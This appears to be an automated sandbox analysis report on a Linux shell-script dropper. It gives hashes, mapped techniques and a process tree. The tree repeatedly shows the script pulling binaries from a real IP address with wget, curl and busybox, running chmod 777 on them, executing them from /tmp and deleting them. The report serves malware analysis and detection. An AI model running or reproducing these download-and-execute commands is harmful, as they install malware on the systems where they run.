Analysis
-
max time kernel
29s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
-
Size
10KB
-
MD5
c27e3dbba79b6afbd8c32c4e50cffe76
-
SHA1
b2ec5ed7bd931b3a3b970e1d5d209d031219a547
-
SHA256
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040
-
SHA512
382804bca6a3c36dfe896726e67efbf903aede59316574bba39dd8b943f31a5caefcd2d666eb0bd1513c38a33fcde0e4d9245781648860f8c077675e5206f023
-
SSDEEP
192:mhN4hJ8oKCm/mPmympmFmO/1JdUJh1s8hN4hJRJdUJhXm/mPmympmFmWo:eoKnue3kYO/Isrue3kYWo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1548 chmod 1554 chmod 1584 chmod 1608 chmod 1656 chmod 1494 chmod 1602 chmod 1614 chmod 1644 chmod 1650 chmod 1512 chmod 1626 chmod 1518 chmod 1536 chmod 1572 chmod 1578 chmod 1596 chmod 1506 chmod 1620 chmod 1500 chmod 1542 chmod 1632 chmod 1524 chmod 1530 chmod 1560 chmod 1566 chmod 1590 chmod 1638 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 1495 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF 1501 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB 1507 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o 1513 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey 1519 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod 1525 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG 1531 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 1537 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq 1543 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca 1549 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp 1555 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n 1561 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL 1567 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz 1573 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp 1579 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n 1585 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL 1591 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz 1597 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o 1603 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 1609 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF 1615 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB 1621 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca 1627 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey 1633 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod 1639 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG 1645 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 1651 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq 1657 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL curl File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod curl File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey curl File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod curl File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz curl File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB curl File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB curl File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca curl File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca curl File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp curl File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz curl File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq curl File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL curl File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF curl File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey curl File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o curl File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n curl File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG curl File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o curl File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG curl File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 curl File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq curl File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF curl File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 curl File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp curl File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n curl
Processes
-
/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh1⤵PID:1484
-
/bin/rm/bin/rm bins.sh2⤵PID:1485
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:1486
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Writes file to tmp directory
PID:1492
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:1493
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:1494
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:1495
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:1496
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:1497
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Writes file to tmp directory
PID:1498
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:1499
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:1500
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:1501
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:1502
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:1503
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Writes file to tmp directory
PID:1504
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:1505
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:1506
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:1507
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:1508
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:1509
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:1511
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:1513
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:1514
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:1515
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:1517
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:1519
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:1520
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:1521
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:1523
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:1526
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:1527
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:1529
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:1531
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:1532
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:1533
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:1535
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:1537
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:1538
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:1539
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:1541
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:1543
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:1544
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:1545
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:1547
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:1549
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:1550
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:1551
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:1553
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:1555
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:1556
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:1557
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:1559
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:1561
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:1562
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:1563
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:1565
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:1568
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:1569
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:1571
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:1573
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:1574
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:1575
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:1577
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:1579
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:1580
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:1581
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:1583
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:1585
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:1586
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:1587
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:1589
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:1592
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:1593
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:1595
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:1597
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:1598
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:1599
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:1601
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:1604
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:1605
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:1607
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:1610
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:1613
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:1616
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:1619
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:1622
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:1623
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:1625
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:1626
-
-
